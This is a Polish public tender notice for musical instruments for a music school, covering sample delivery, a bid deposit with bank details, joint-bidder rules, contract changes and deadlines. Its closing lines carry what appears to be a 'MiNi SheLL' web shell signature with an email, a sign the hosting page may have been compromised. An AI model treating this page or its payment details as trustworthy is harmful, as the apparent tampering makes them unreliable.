<br/>spełnienia warunków określonych dla przedmiotów zamówienia oraz będą podlegały ocenie pod <br/>względem kryteriów oceny ofert jakim są między innymi Jakość oferowanego instrumentu. <br/>11.3.Dostarczone przedmiotowe środki dowodowe zostaną przez Wykonawcę wniesione, ustawione we <br/>wskazanym przez Zamawiającego miejscu, i przygotowane do oceny jakościowej zgodnie z opisem <br/>przedmiotu zamówienia, <br/>11.4. Przedmiotowe środki dowodowe należy dostarczyć w dniach od poniedziałku do piątku w godzinach od <br/>9:00 do godziny 18:00 pod wskazany powyżej adres szkoły. Dostawa i odbiór instrumentów odbywać się <br/>będzie na koszt i ryzyko Wykonawcy. <br/>11.5. Zamawiający wyznacza następującą osoby do kontaktu z Wykonawcami w sprawie dostarczenia <br/>i odbioru przedmiotowych środków dowodowego w postaci ww. instrumentów: 1) Jolanta Poplucz - <br/>Dyrektor PSM I stopnia nr 1 w Kędzierzynie-Koźlu j.poplucz@psm1kedzierzyn.pl <br/>2) Małgorzata Kowalewska - Sekretarz PSM I stopnia nr 1 w Kędzierzynie-Koźlu, <br/>sekretariat@psm1kedzierzyn.pl, Telefon: 77 472-33-95 <br/> <br/>11.6.Wykonawca dostarczając przedmiotowe środki dowodowe dokona oznaczenia instrumentów. <br/>11.7.Fakt dostarczenia przedmiotowych środków dowodowych w postaci oferowanych instrumentów zostanie <br/>odnotowany przez Zamawiającego w formie protokołu zawierającego: Nazwę i adres Wykonawcy, dzień, godzinę oraz miejsce ich dostarczenia. <br/>11.8. Niezłożenie oferowanych instrumentów w postaci modeli fizycznych przed upływem terminu składania ofert skutkować będzie odrzuceniem złożonej oferty na podstawie art. 226 ust 1 pkt 2c. <br/>11.9. Zamawiający przewiduje możliwości uzupełnienia przedmiotowych środków dowodowych. <br/>11.10. Zgodnie z art. 77 ust 1 ustawy Pzp, oferowane instrumenty stanowiące przedmiotowe środki dowodowe, Zamawiający zwróci Wykonawcom na ich wniosek po zakończeniu postępowania tj. po zawarciu umowy lub po unieważnieniu postępowania. <br/>11.11. W przypadku gdy Wykonawca nie złoży wniosku o dokonanie zwrotu oferowanych instrumentów w terminie 30 dni od dnia zawarcia umowy lub unieważnienia postępowania, Zamawiający zwróci Wykonawcy oferowane instrumenty, przy czym zgodnie z postanowieniami zwrot instrumentu <br/>odbywać się będzie na koszt i ryzyko Wykonawcy. <br/>11.12. Zamawiający dopuszcza możliwość , że w przypadku wyboru danej oferty oceniany instrument, spełniający wszystkie wymagania Zamawiającego określone w SZW i opisie przedmiotu zamówienia może być także przedmiotem dostawy na etapie realizacji umowy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Fortepian, pianina, altówki <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> SWZ<br/>15.1. Oferta musi być zabezpieczona wadium w wysokości: - 8 000,00 PLN (słownie: osiem <br/>tysięcy zł 00/100). <br/>15.2. Wadium należy wnieść przed upływem terminu składania ofert. <br/>15.3. Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego. <br/>15.4. Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1) pieniądzu: przelewem na rachunek bankowy Zamawiającego: 57 1010 1401 0030 1413 9120 <br/>0000; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019r. <br/>poz. 310, 836 i 1572). <br/>15.5. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z <br/>ustawy Pzp, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze <br/>żądanie Zamawiającego, w przypadkach określonych w ustawie Pzp oraz być ważne przez okres <br/>związania ofertą, określony w niniejszej SWZ. Musi być wykonalne na terytorium Rzeczypospolitej <br/>Polskiej. <br/>15.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje <br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>15.7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia <br/>wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą; <br/>2) zawarcia umowy w sprawie zamówienia publicznego; <br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało <br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>15.8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku <br/>zwraca wadium wykonawcy: <br/>1) który wycofał ofertę przed upływem terminu składania ofert; <br/>2) którego oferta została odrzucona; <br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako <br/>najkorzystniejsza; <br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność <br/>unieważnienia albo nie upłynął termin do jego wniesienia. <br/>15.9. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 15.8, powoduje rozwiązanie <br/>stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony <br/>prawnej, o których mowa w dziale IX ustawy Pzp. <br/>15.10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w <br/>formie gwarancji lub poręczenia występuje odpowiednio do gwaranta lub poręczyciela z żądaniem <br/>zapłaty wadium w okolicznościach wskazanych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> PKT 7 SWZ - WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA.<br/>7.1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w<br/>niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści<br/>pełnomocnictwa przedłożonego wraz z ofertą.<br/>7.2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został<br/>sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje roboty, dostawy lub usługi do których realizacji te uprawnienia są<br/>wymagane.<br/>7.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały<br/>sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te zdolności są wymagane.<br/>7.4 W przypadku, o którym mowa w pkt 7.2 i 7.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi, roboty wykonają poszczególni wykonawcy.<br/>7.5 Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres<br/>umocowania. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>7.6 Oświadczenie o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu (art. 125 ust. 1) składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnienie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>7.7 Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu z<br/>postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do wykluczenia składają każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy).<br/>7.8 W przypadku wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do zawarcia umowy cywilnoprawnej<br/>określającą rolę i zadania poszczególnych Wykonawców oraz zasady ich współdziałania podczas realizacji zamówienia.<br/>Zamawiający może żądać przedstawienia wyżej wskazanej umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> PPU § 8 Zmian umowy<br/> 1. Strony przewidują zmianę umowy w przypadku: <br/>1) Zmiany stawki podatku od towarów i usług VAT oraz podatku akcyzowego. Stawka i kwota podatku oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku, co oznacza, że Zamawiający dopuszcza możliwość zmniejszenia i zwiększenia wynagrodzenia brutto o kwotę równą różnicy wynikającej ze zmienionej stawki podatku - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku jeszcze nie wykonano; <br/>2) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ <br/>na realizację umowy, Zamawiający dopuszcza możliwość zmiany postanowień umowy <br/>w zakresie wynagrodzenia , terminu wykonania umowy, <br/>3) Wystąpienia siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia , którego nie dało się uniknąć przy zachowaniu najwyższej staranności, Zamawiający dopuszcza możliwość zmiany umowy w zakresie terminu wykonania umowy. <br/>2. Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy w okolicznościach i przypadkach określonych w art. 455 ust. 1 pkt 3 i 4 oraz art. 455 ust. 2 ustawy. <br/>3. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. <br/>4. Niedopuszczalna jest istotna zmiana umowy. Zmiana jest istotna, jeżeli powoduje, że charakter umowy zmienia się w sposób istotny w stosunku do pierwotnej umowy, <br/>w szczególności jeżeli zmiana: <br/>1) wprowadza warunki, które gdyby zostały zastosowane w postępowaniu o udzielenie zamówienia, to wzięliby w nim udział lub mogliby wziąć udział inni wykonawcy lub przyjęte zostałyby oferty innej treści; <br/>2) narusza równowagę ekonomiczną stron umowy na korzyść wykonawcy, w sposób nieprzewidziany w pierwotnej umowie; <br/>3) w sposób znaczny rozszerza albo zmniejsza zakres świadczeń i zobowiązań wynikający z umowy; <br/>4) polega na zastąpieniu wykonawcy, któremu Zamawiający udzielił zamówienia, nowym wykonawcą w przypadkach innych, niż wskazane w art. 455 ust. 1 pkt 2 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-26 16:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2b228319-f45c-4ef7-8a15-5c32cba76555</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-26 16:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835). Do Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 ww. ustawy<br/><br/>Zamówienie należy wykonać w terminie: do 10 dni od daty zawarcia umowy, <br/>Okres gwarancji wynosi: minimum: 60 miesięcy na instrumenty muzyczne, licząc od dnia protokołu odbioru końcowego dostawy, lecz nie więcej niż 120 miesięcy (wartość oceniana). Okres rękojmi wynosi 5 lat licząc od dnia wykonania zamówienia i uznania przez zamawiającego <br/>za należycie wykonane (protokół odbioru końcowego).

Creat By MiNi SheLL
Email: jattceo@gmail.com